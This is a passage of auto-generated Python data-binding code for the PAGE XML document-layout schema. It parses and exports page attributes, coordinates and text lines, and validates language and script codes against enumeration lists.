value = find_attr_value_('imageYResolution', node)
if value is not None and 'imageYResolution' not in already_processed:
already_processed.add('imageYResolution')
value = self.gds_parse_float(value, node, 'imageYResolution')
self.imageYResolution = value
value = find_attr_value_('imageResolutionUnit', node)
if value is not None and 'imageResolutionUnit' not in already_processed:
already_processed.add('imageResolutionUnit')
self.imageResolutionUnit = value
self.validate_imageResolutionUnitType(self.imageResolutionUnit) # validate type imageResolutionUnitType
value = find_attr_value_('custom', node)
if value is not None and 'custom' not in already_processed:
already_processed.add('custom')
self.custom = value
value = find_attr_value_('orientation', node)
if value is not None and 'orientation' not in already_processed:
already_processed.add('orientation')
value = self.gds_parse_float(value, node, 'orientation')
self.orientation = value
value = find_attr_value_('type', node)
if value is not None and 'type' not in already_processed:
already_processed.add('type')
self.type_ = value
self.validate_PageTypeSimpleType(self.type_) # validate type PageTypeSimpleType
value = find_attr_value_('primaryLanguage', node)
if value is not None and 'primaryLanguage' not in already_processed:
already_processed.add('primaryLanguage')
self.primaryLanguage = value
self.validate_LanguageSimpleType(self.primaryLanguage) # validate type LanguageSimpleType
value = find_attr_value_('secondaryLanguage', node)
if value is not None and 'secondaryLanguage' not in already_processed:
already_processed.add('secondaryLanguage')
self.secondaryLanguage = value
self.validate_LanguageSimpleType(self.secondaryLanguage) # validate type LanguageSimpleType
value = find_attr_value_('primaryScript', node)
if value is not None and 'primaryScript' not in already_processed:
already_processed.add('primaryScript')
self.primaryScript = value
self.validate_ScriptSimpleType(self.primaryScript) # validate type ScriptSimpleType
value = find_attr_value_('secondaryScript', node)
if value is not None and 'secondaryScript' not in already_processed:
already_processed.add('secondaryScript')
self.secondaryScript = value
self.validate_ScriptSimpleType(self.secondaryScript) # validate type ScriptSimpleType
value = find_attr_value_('readingDirection', node)
if value is not None and 'readingDirection' not in already_processed:
already_processed.add('readingDirection')
self.readingDirection = value
self.validate_ReadingDirectionSimpleType(self.readingDirection) # validate type ReadingDirectionSimpleType
value = find_attr_value_('textLineOrder', node)
if value is not None and 'textLineOrder' not in already_processed:
already_processed.add('textLineOrder')
self.textLineOrder = value
self.validate_TextLineOrderSimpleType(self.textLineOrder) # validate type TextLineOrderSimpleType
value = find_attr_value_('conf', node)
if value is not None and 'conf' not in already_processed:
already_processed.add('conf')
value = self.gds_parse_float(value, node, 'conf')
self.conf = value
self.validate_ConfSimpleType(self.conf) # validate type ConfSimpleType
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
if nodeName_ == 'AlternativeImage':
obj_ = AlternativeImageType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.AlternativeImage.append(obj_)
obj_.original_tagname_ = 'AlternativeImage'
elif nodeName_ == 'Border':
obj_ = BorderType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.Border = obj_
obj_.original_tagname_ = 'Border'
elif nodeName_ == 'PrintSpace':
obj_ = PrintSpaceType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.PrintSpace = obj_
obj_.original_tagname_ = 'PrintSpace'
elif nodeName_ == 'ReadingOrder':
obj_ = ReadingOrderType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.ReadingOrder = obj_
obj_.original_tagname_ = 'ReadingOrder'
elif nodeName_ == 'Layers':
obj_ = LayersType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.Layers = obj_
obj_.original_tagname_ = 'Layers'
elif nodeName_ == 'Relations':
obj_ = RelationsType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.Relations = obj_
obj_.original_tagname_ = 'Relations'
elif nodeName_ == 'TextStyle':
obj_ = TextStyleType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.TextStyle = obj_
obj_.original_tagname_ = 'TextStyle'
elif nodeName_ == 'UserDefined':
obj_ = UserDefinedType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.UserDefined = obj_
obj_.original_tagname_ = 'UserDefined'
elif nodeName_ == 'Labels':
obj_ = LabelsType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.Labels.append(obj_)
obj_.original_tagname_ = 'Labels'
elif nodeName_ == 'TextRegion':
obj_ = TextRegionType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.TextRegion.append(obj_)
obj_.original_tagname_ = 'TextRegion'
elif nodeName_ == 'ImageRegion':
obj_ = ImageRegionType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.ImageRegion.append(obj_)
obj_.original_tagname_ = 'ImageRegion'
elif nodeName_ == 'LineDrawingRegion':
obj_ = LineDrawingRegionType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.LineDrawingRegion.append(obj_)
obj_.original_tagname_ = 'LineDrawingRegion'
elif nodeName_ == 'GraphicRegion':
obj_ = GraphicRegionType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.GraphicRegion.append(obj_)
obj_.original_tagname_ = 'GraphicRegion'
elif nodeName_ == 'TableRegion':
obj_ = TableRegionType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.TableRegion.append(obj_)
obj_.original_tagname_ = 'TableRegion'
elif nodeName_ == 'ChartRegion':
obj_ = ChartRegionType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.ChartRegion.append(obj_)
obj_.original_tagname_ = 'ChartRegion'
elif nodeName_ == 'MapRegion':
obj_ = MapRegionType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.MapRegion.append(obj_)
obj_.original_tagname_ = 'MapRegion'
elif nodeName_ == 'SeparatorRegion':
obj_ = SeparatorRegionType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.SeparatorRegion.append(obj_)
obj_.original_tagname_ = 'SeparatorRegion'
elif nodeName_ == 'MathsRegion':
obj_ = MathsRegionType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.MathsRegion.append(obj_)
obj_.original_tagname_ = 'MathsRegion'
elif nodeName_ == 'ChemRegion':
obj_ = ChemRegionType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.ChemRegion.append(obj_)
obj_.original_tagname_ = 'ChemRegion'
elif nodeName_ == 'MusicRegion':
obj_ = MusicRegionType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.MusicRegion.append(obj_)
obj_.original_tagname_ = 'MusicRegion'
elif nodeName_ == 'AdvertRegion':
obj_ = AdvertRegionType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.AdvertRegion.append(obj_)
obj_.original_tagname_ = 'AdvertRegion'
elif nodeName_ == 'NoiseRegion':
obj_ = NoiseRegionType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.NoiseRegion.append(obj_)
obj_.original_tagname_ = 'NoiseRegion'
elif nodeName_ == 'UnknownRegion':
obj_ = UnknownRegionType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.UnknownRegion.append(obj_)
obj_.original_tagname_ = 'UnknownRegion'
elif nodeName_ == 'CustomRegion':
obj_ = CustomRegionType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.CustomRegion.append(obj_)
obj_.original_tagname_ = 'CustomRegion'
def get_polygon(self):
'''
Get polygon from Page element (whole image)
'''
x0y0 = [0, 0]
x1y0 = [self.imageWidth - 1, 0]
x1y1 = [self.imageWidth - 1, self.imageHeight - 1]
x0y1 = [0, self.imageHeight - 1]
return [x0y0, x1y0, x1y1, x0y1, x0y0]
def get_polygon_string(self):
'''
Get polygon string from Page element (whole image)
'''
x0y0 = '0,0'
x1y0 = str(self.imageWidth - 1) + ',0'
x1y1 = str(self.imageWidth - 1) + ',' + str(self.imageHeight - 1)
x0y1 = '0,' + str(self.imageHeight - 1)
return ','.join([x0y0, x1y0, x1y1, x0y1, x0y0])
# end class PageType
class CoordsType(GeneratedsSuper):
"""Polygon outline of the element as a path of points.
No points may lie outside the outline of its parent,
which in the case of Border is the bounding rectangle
of the root image. Paths are closed by convention,
i.e. the last point logically connects with the first
(and at least 3 points are required to span an area).
Paths must be planar (i.e. must not self-intersect).
Confidence value (between 0 and 1)"""
__hash__ = GeneratedsSuper.__hash__
member_data_items_ = [
MemberSpec_('points', 'pc:PointsType', 0, 0, {'use': 'required'}),
MemberSpec_('conf', 'pc:ConfSimpleType', 0, 1, {'use': 'optional'}),
]
subclass = None
superclass = None
def __init__(self, points=None, conf=None, gds_collector_=None, **kwargs_):
self.gds_collector_ = gds_collector_
self.gds_elementtree_node_ = None
self.original_tagname_ = None
self.parent_object_ = kwargs_.get('parent_object_')
self.ns_prefix_ = "pc"
self.points = _cast(None, points)
self.points_nsprefix_ = None
self.conf = _cast(float, conf)
self.conf_nsprefix_ = None
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, CoordsType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if CoordsType.subclass:
return CoordsType.subclass(*args_, **kwargs_)
else:
return CoordsType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_ns_prefix_(self):
return self.ns_prefix_
def set_ns_prefix_(self, ns_prefix):
self.ns_prefix_ = ns_prefix
def get_points(self):
return self.points
def set_points(self, points):
self.points = points
def get_conf(self):
return self.conf
def set_conf(self, conf):
self.conf = conf
def validate_PointsType(self, value):
# Validate type pc:PointsType, a restriction on string.
if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
if not isinstance(value, str):
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
return False
if not self.gds_validate_simple_patterns(
self.validate_PointsType_patterns_, value):
self.gds_collector_.add_message('Value "%s" does not match xsd pattern restrictions: %s' % (encode_str_2_3(value), self.validate_PointsType_patterns_, ))
validate_PointsType_patterns_ = [['^(([0-9]+,[0-9]+ )+([0-9]+,[0-9]+))$']]
def validate_ConfSimpleType(self, value):
# Validate type pc:ConfSimpleType, a restriction on float.
if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
if not isinstance(value, float):
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (float)' % {"value": value, "lineno": lineno, })
return False
if value < 0:
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd minInclusive restriction on ConfSimpleType' % {"value": value, "lineno": lineno} )
result = False
if value > 1:
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd maxInclusive restriction on ConfSimpleType' % {"value": value, "lineno": lineno} )
result = False
def hasContent_(self):
if (
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='CoordsType', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('CoordsType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None and name_ == 'CoordsType':
name_ = self.original_tagname_
if UseCapturedNS_ and self.ns_prefix_:
namespaceprefix_ = self.ns_prefix_ + ':'
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='CoordsType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='CoordsType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='CoordsType'):
if self.points is not None and 'points' not in already_processed:
already_processed.add('points')
outfile.write(' points=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.points), input_name='points')), ))
if self.conf is not None and 'conf' not in already_processed:
already_processed.add('conf')
outfile.write(' conf="%s"' % self.gds_format_float(self.conf, input_name='conf'))
def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='CoordsType', fromsubclass_=False, pretty_print=True):
pass
def build(self, node, gds_collector_=None):
self.gds_collector_ = gds_collector_
if SaveElementTreeNode:
self.gds_elementtree_node_ = node
already_processed = set()
self.ns_prefix_ = node.prefix
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('points', node)
if value is not None and 'points' not in already_processed:
already_processed.add('points')
self.points = value
self.validate_PointsType(self.points) # validate type PointsType
value = find_attr_value_('conf', node)
if value is not None and 'conf' not in already_processed:
already_processed.add('conf')
value = self.gds_parse_float(value, node, 'conf')
self.conf = value
self.validate_ConfSimpleType(self.conf) # validate type ConfSimpleType
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
pass
# end class CoordsType
class TextLineType(GeneratedsSuper):
"""Overrides primaryLanguage attribute of parent text
region
The primary script used in the text line
The secondary script used in the text line
The direction in which text within the line
should be read (order of words and characters).
Overrides the production attribute of the parent
text region
For generic use
Position (order number) of this text line within the
parent text region."""
__hash__ = GeneratedsSuper.__hash__
member_data_items_ = [
MemberSpec_('id', 'string', 0, 0, {'use': 'required'}),
MemberSpec_('primaryLanguage', 'pc:LanguageSimpleType', 0, 1, {'use': 'optional'}),
MemberSpec_('primaryScript', 'pc:ScriptSimpleType', 0, 1, {'use': 'optional'}),
MemberSpec_('secondaryScript', 'pc:ScriptSimpleType', 0, 1, {'use': 'optional'}),
MemberSpec_('readingDirection', 'pc:ReadingDirectionSimpleType', 0, 1, {'use': 'optional'}),
MemberSpec_('production', 'pc:ProductionSimpleType', 0, 1, {'use': 'optional'}),
MemberSpec_('custom', 'string', 0, 1, {'use': 'optional'}),
MemberSpec_('comments', 'string', 0, 1, {'use': 'optional'}),
MemberSpec_('index', 'int', 0, 1, {'use': 'optional'}),
MemberSpec_('AlternativeImage', 'AlternativeImageType', 1, 1, {'maxOccurs': 'unbounded', 'minOccurs': '0', 'name': 'AlternativeImage', 'type': 'AlternativeImageType'}, None),
MemberSpec_('Coords', 'CoordsType', 0, 0, {'name': 'Coords', 'type': 'CoordsType'}, None),
MemberSpec_('Baseline', 'BaselineType', 0, 1, {'minOccurs': '0', 'name': 'Baseline', 'type': 'BaselineType'}, None),
MemberSpec_('Word', 'WordType', 1, 1, {'maxOccurs': 'unbounded', 'minOccurs': '0', 'name': 'Word', 'type': 'WordType'}, None),
MemberSpec_('TextEquiv', 'TextEquivType', 1, 1, {'maxOccurs': 'unbounded', 'minOccurs': '0', 'name': 'TextEquiv', 'type': 'TextEquivType'}, None),
MemberSpec_('TextStyle', 'TextStyleType', 0, 1, {'minOccurs': '0', 'name': 'TextStyle', 'type': 'TextStyleType'}, None),
MemberSpec_('UserDefined', 'UserDefinedType', 0, 1, {'maxOccurs': '1', 'minOccurs': '0', 'name': 'UserDefined', 'type': 'UserDefinedType'}, None),
MemberSpec_('Labels', 'LabelsType', 1, 1, {'maxOccurs': 'unbounded', 'minOccurs': '0', 'name': 'Labels', 'type': 'LabelsType'}, None),
]
subclass = None
superclass = None
def __init__(self, id=None, primaryLanguage=None, primaryScript=None, secondaryScript=None, readingDirection=None, production=None, custom=None, comments=None, index=None, AlternativeImage=None, Coords=None, Baseline=None, Word=None, TextEquiv=None, TextStyle=None, UserDefined=None, Labels=None, gds_collector_=None, **kwargs_):
self.gds_collector_ = gds_collector_
self.gds_elementtree_node_ = None
self.original_tagname_ = None
self.parent_object_ = kwargs_.get('parent_object_')
self.ns_prefix_ = "pc"
self.id = _cast(None, id)
self.id_nsprefix_ = None
self.primaryLanguage = _cast(None, primaryLanguage)
self.primaryLanguage_nsprefix_ = None
self.primaryScript = _cast(None, primaryScript)
self.primaryScript_nsprefix_ = None
self.secondaryScript = _cast(None, secondaryScript)
self.secondaryScript_nsprefix_ = None
self.readingDirection = _cast(None, readingDirection)
self.readingDirection_nsprefix_ = None
self.production = _cast(None, production)
self.production_nsprefix_ = None
self.custom = _cast(None, custom)
self.custom_nsprefix_ = None
self.comments = _cast(None, comments)
self.comments_nsprefix_ = None
self.index = _cast(int, index)
self.index_nsprefix_ = None
if AlternativeImage is None:
self.AlternativeImage = []
else:
self.AlternativeImage = AlternativeImage
self.AlternativeImage_nsprefix_ = "pc"
self.Coords = Coords
self.Coords_nsprefix_ = "pc"
self.Baseline = Baseline
self.Baseline_nsprefix_ = "pc"
if Word is None:
self.Word = []
else:
self.Word = Word
self.Word_nsprefix_ = "pc"
if TextEquiv is None:
self.TextEquiv = []
else:
self.TextEquiv = TextEquiv
self.TextEquiv_nsprefix_ = "pc"
self.TextStyle = TextStyle
self.TextStyle_nsprefix_ = "pc"
self.UserDefined = UserDefined
self.UserDefined_nsprefix_ = "pc"
if Labels is None:
self.Labels = []
else:
self.Labels = Labels
self.Labels_nsprefix_ = "pc"
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, TextLineType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if TextLineType.subclass:
return TextLineType.subclass(*args_, **kwargs_)
else:
return TextLineType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_ns_prefix_(self):
return self.ns_prefix_
def set_ns_prefix_(self, ns_prefix):
self.ns_prefix_ = ns_prefix
def get_AlternativeImage(self):
return self.AlternativeImage
def set_AlternativeImage(self, AlternativeImage):
self.AlternativeImage = AlternativeImage
def add_AlternativeImage(self, value):
self.AlternativeImage.append(value)
def insert_AlternativeImage_at(self, index, value):
self.AlternativeImage.insert(index, value)
def replace_AlternativeImage_at(self, index, value):
self.AlternativeImage[index] = value
def get_Coords(self):
return self.Coords
def set_Coords(self, Coords):
self.Coords = Coords
def get_Baseline(self):
return self.Baseline
def set_Baseline(self, Baseline):
self.Baseline = Baseline
def get_Word(self):
return self.Word
def set_Word(self, Word):
self.Word = Word
def add_Word(self, value):
self.Word.append(value)
def insert_Word_at(self, index, value):
self.Word.insert(index, value)
def replace_Word_at(self, index, value):
self.Word[index] = value
def get_TextEquiv(self):
return self.TextEquiv
def set_TextEquiv(self, TextEquiv):
self.TextEquiv = TextEquiv
def add_TextEquiv(self, value):
self.TextEquiv.append(value)
def insert_TextEquiv_at(self, index, value):
self.TextEquiv.insert(index, value)
def replace_TextEquiv_at(self, index, value):
self.TextEquiv[index] = value
def get_TextStyle(self):
return self.TextStyle
def set_TextStyle(self, TextStyle):
self.TextStyle = TextStyle
def get_UserDefined(self):
return self.UserDefined
def set_UserDefined(self, UserDefined):
self.UserDefined = UserDefined
def get_Labels(self):
return self.Labels
def set_Labels(self, Labels):
self.Labels = Labels
def add_Labels(self, value):
self.Labels.append(value)
def insert_Labels_at(self, index, value):
self.Labels.insert(index, value)
def replace_Labels_at(self, index, value):
self.Labels[index] = value
def get_id(self):
return self.id
def set_id(self, id):
self.id = id
def get_primaryLanguage(self):
return self.primaryLanguage
def set_primaryLanguage(self, primaryLanguage):
self.primaryLanguage = primaryLanguage
def get_primaryScript(self):
return self.primaryScript
def set_primaryScript(self, primaryScript):
self.primaryScript = primaryScript
def get_secondaryScript(self):
return self.secondaryScript
def set_secondaryScript(self, secondaryScript):
self.secondaryScript = secondaryScript
def get_readingDirection(self):
return self.readingDirection
def set_readingDirection(self, readingDirection):
self.readingDirection = readingDirection
def get_production(self):
return self.production
def set_production(self, production):
self.production = production
def get_custom(self):
return self.custom
def set_custom(self, custom):
self.custom = custom
def get_comments(self):
return self.comments
def set_comments(self, comments):
self.comments = comments
def get_index(self):
return self.index
def set_index(self, index):
self.index = index
def validate_LanguageSimpleType(self, value):
# Validate type pc:LanguageSimpleType, a restriction on string.
if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
if not isinstance(value, str):
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
return False
value = value
enumerations = ['Abkhaz', 'Afar', 'Afrikaans', 'Akan', 'Albanian', 'Amharic', 'Arabic', 'Aragonese', 'Armenian', 'Assamese', 'Avaric', 'Avestan', 'Aymara', 'Azerbaijani', 'Bambara', 'Bashkir', 'Basque', 'Belarusian', 'Bengali', 'Bihari', 'Bislama', 'Bosnian', 'Breton', 'Bulgarian', 'Burmese', 'Cambodian', 'Cantonese', 'Catalan', 'Chamorro', 'Chechen', 'Chichewa', 'Chinese', 'Chuvash', 'Cornish', 'Corsican', 'Cree', 'Croatian', 'Czech', 'Danish', 'Divehi', 'Dutch', 'Dzongkha', 'English', 'Esperanto', 'Estonian', 'Ewe', 'Faroese', 'Fijian', 'Finnish', 'French', 'Fula', 'Gaelic', 'Galician', 'Ganda', 'Georgian', 'German', 'Greek', 'Guaraní', 'Gujarati', 'Haitian', 'Hausa', 'Hebrew', 'Herero', 'Hindi', 'Hiri Motu', 'Hungarian', 'Icelandic', 'Ido', 'Igbo', 'Indonesian', 'Interlingua', 'Interlingue', 'Inuktitut', 'Inupiaq', 'Irish', 'Italian', 'Japanese', 'Javanese', 'Kalaallisut', 'Kannada', 'Kanuri', 'Kashmiri', 'Kazakh', 'Khmer', 'Kikuyu', 'Kinyarwanda', 'Kirundi', 'Komi', 'Kongo', 'Korean', 'Kurdish', 'Kwanyama', 'Kyrgyz', 'Lao', 'Latin', 'Latvian', 'Limburgish', 'Lingala', 'Lithuanian', 'Luba-Katanga', 'Luxembourgish', 'Macedonian', 'Malagasy', 'Malay', 'Malayalam', 'Maltese', 'Manx', 'Māori', 'Marathi', 'Marshallese', 'Mongolian', 'Nauru', 'Navajo', 'Ndonga', 'Nepali', 'North Ndebele', 'Northern Sami', 'Norwegian', 'Norwegian Bokmål', 'Norwegian Nynorsk', 'Nuosu', 'Occitan', 'Ojibwe', 'Old Church Slavonic', 'Oriya', 'Oromo', 'Ossetian', 'Pāli', 'Panjabi', 'Pashto', 'Persian', 'Polish', 'Portuguese', 'Punjabi', 'Quechua', 'Romanian', 'Romansh', 'Russian', 'Samoan', 'Sango', 'Sanskrit', 'Sardinian', 'Serbian', 'Shona', 'Sindhi', 'Sinhala', 'Slovak', 'Slovene', 'Somali', 'South Ndebele', 'Southern Sotho', 'Spanish', 'Sundanese', 'Swahili', 'Swati', 'Swedish', 'Tagalog', 'Tahitian', 'Tajik', 'Tamil', 'Tatar', 'Telugu', 'Thai', 'Tibetan', 'Tigrinya', 'Tonga', 'Tsonga', 'Tswana', 'Turkish', 'Turkmen', 'Twi', 'Uighur', 'Ukrainian', 'Urdu', 'Uzbek', 'Venda', 'Vietnamese', 'Volapük', 'Walloon', 'Welsh', 'Western Frisian', 'Wolof', 'Xhosa', 'Yiddish', 'Yoruba', 'Zhuang', 'Zulu', 'other']
if value not in enumerations:
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd enumeration restriction on LanguageSimpleType' % {"value" : encode_str_2_3(value), "lineno": lineno} )
result = False
def validate_ScriptSimpleType(self, value):
# Validate type pc:ScriptSimpleType, a restriction on string.
if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
if not isinstance(value, str):
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
return False
value = value
enumerations = ['Adlm - Adlam', 'Afak - Afaka', 'Aghb - Caucasian Albanian', 'Ahom - Ahom, Tai Ahom', 'Arab - Arabic', 'Aran - Arabic (Nastaliq variant)', 'Armi - Imperial Aramaic', 'Armn - Armenian', 'Avst - Avestan', 'Bali - Balinese', 'Bamu - Bamum', 'Bass - Bassa Vah', 'Batk - Batak', 'Beng - Bengali', 'Bhks - Bhaiksuki', 'Blis - Blissymbols', 'Bopo - Bopomofo', 'Brah - Brahmi', 'Brai - Braille', 'Bugi - Buginese', 'Buhd - Buhid', 'Cakm - Chakma', 'Cans - Unified Canadian Aboriginal Syllabics', 'Cari - Carian', 'Cham - Cham', 'Cher - Cherokee', 'Cirt - Cirth', 'Copt - Coptic', 'Cprt - Cypriot', 'Cyrl - Cyrillic', 'Cyrs - Cyrillic (Old Church Slavonic variant)', 'Deva - Devanagari (Nagari)', 'Dsrt - Deseret (Mormon)', 'Dupl - Duployan shorthand, Duployan stenography', 'Egyd - Egyptian demotic', 'Egyh - Egyptian hieratic', 'Egyp - Egyptian hieroglyphs', 'Elba - Elbasan', 'Ethi - Ethiopic', 'Geok - Khutsuri (Asomtavruli and Nuskhuri)', 'Geor - Georgian (Mkhedruli)', 'Glag - Glagolitic', 'Goth - Gothic', 'Gran - Grantha', 'Grek - Greek', 'Gujr - Gujarati', 'Guru - Gurmukhi', 'Hanb - Han with Bopomofo', 'Hang - Hangul', 'Hani - Han (Hanzi, Kanji, Hanja)', 'Hano - Hanunoo (Hanunóo)', 'Hans - Han (Simplified variant)', 'Hant - Han (Traditional variant)', 'Hatr - Hatran', 'Hebr - Hebrew', 'Hira - Hiragana', 'Hluw - Anatolian Hieroglyphs', 'Hmng - Pahawh Hmong', 'Hrkt - Japanese syllabaries', 'Hung - Old Hungarian (Hungarian Runic)', 'Inds - Indus (Harappan)', 'Ital - Old Italic (Etruscan, Oscan etc.)', 'Jamo - Jamo', 'Java - Javanese', 'Jpan - Japanese', 'Jurc - Jurchen', 'Kali - Kayah Li', 'Kana - Katakana', 'Khar - Kharoshthi', 'Khmr - Khmer', 'Khoj - Khojki', 'Kitl - Khitan large script', 'Kits - Khitan small script', 'Knda - Kannada', 'Kore - Korean (alias for Hangul + Han)', 'Kpel - Kpelle', 'Kthi - Kaithi', 'Lana - Tai Tham (Lanna)', 'Laoo - Lao', 'Latf - Latin (Fraktur variant)', 'Latg - Latin (Gaelic variant)', 'Latn - Latin', 'Leke - Leke', 'Lepc - Lepcha (Róng)', 'Limb - Limbu', 'Lina - Linear A', 'Linb - Linear B', 'Lisu - Lisu (Fraser)', 'Loma - Loma', 'Lyci - Lycian', 'Lydi - Lydian', 'Mahj - Mahajani', 'Mand - Mandaic, Mandaean', 'Mani - Manichaean', 'Marc - Marchen', 'Maya - Mayan hieroglyphs', 'Mend - Mende Kikakui', 'Merc - Meroitic Cursive', 'Mero - Meroitic Hieroglyphs', 'Mlym - Malayalam', 'Modi - Modi, Moḍī', 'Mong - Mongolian', 'Moon - Moon (Moon code, Moon script, Moon type)', 'Mroo - Mro, Mru', 'Mtei - Meitei Mayek (Meithei, Meetei)', 'Mult - Multani', 'Mymr - Myanmar (Burmese)', 'Narb - Old North Arabian (Ancient North Arabian)', 'Nbat - Nabataean', 'Newa - Newa, Newar, Newari', 'Nkgb - Nakhi Geba', 'Nkoo - N’Ko', 'Nshu - Nüshu', 'Ogam - Ogham', 'Olck - Ol Chiki (Ol Cemet’, Ol, Santali)', 'Orkh - Old Turkic, Orkhon Runic', 'Orya - Oriya', 'Osge - Osage', 'Osma - Osmanya', 'Palm - Palmyrene', 'Pauc - Pau Cin Hau', 'Perm - Old Permic', 'Phag - Phags-pa', 'Phli - Inscriptional Pahlavi', 'Phlp - Psalter Pahlavi', 'Phlv - Book Pahlavi', 'Phnx - Phoenician', 'Piqd - Klingon (KLI pIqaD)', 'Plrd - Miao (Pollard)', 'Prti - Inscriptional Parthian', 'Rjng - Rejang (Redjang, Kaganga)', 'Roro - Rongorongo', 'Runr - Runic', 'Samr - Samaritan', 'Sara - Sarati', 'Sarb - Old South Arabian', 'Saur - Saurashtra', 'Sgnw - SignWriting', 'Shaw - Shavian (Shaw)', 'Shrd - Sharada, Śāradā', 'Sidd - Siddham', 'Sind - Khudawadi, Sindhi', 'Sinh - Sinhala', 'Sora - Sora Sompeng', 'Sund - Sundanese', 'Sylo - Syloti Nagri', 'Syrc - Syriac', 'Syre - Syriac (Estrangelo variant)', 'Syrj - Syriac (Western variant)', 'Syrn - Syriac (Eastern variant)', 'Tagb - Tagbanwa', 'Takr - Takri', 'Tale - Tai Le', 'Talu - New Tai Lue', 'Taml - Tamil', 'Tang - Tangut', 'Tavt - Tai Viet', 'Telu - Telugu', 'Teng - Tengwar', 'Tfng - Tifinagh (Berber)', 'Tglg - Tagalog (Baybayin, Alibata)', 'Thaa - Thaana', 'Thai - Thai', 'Tibt - Tibetan', 'Tirh - Tirhuta', 'Ugar - Ugaritic', 'Vaii - Vai', 'Visp - Visible Speech', 'Wara - Warang Citi (Varang Kshiti)', 'Wole - Woleai', 'Xpeo - Old Persian', 'Xsux - Cuneiform, Sumero-Akkadian', 'Yiii - Yi', 'Zinh - Code for inherited script', 'Zmth - Mathematical notation', 'Zsye - Symbols (Emoji variant)', 'Zsym - Symbols', 'Zxxx - Code for unwritten documents', 'Zyyy - Code for undetermined script', 'Zzzz - Code for uncoded script', 'other']
if value not in enumerations:
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd enumeration restriction on ScriptSimpleType' % {"value" : encode_str_2_3(value), "lineno": lineno} )
result = False
def validate_ReadingDirectionSimpleType(self, value):
# Validate type pc:ReadingDirectionSimpleType, a restriction on string.
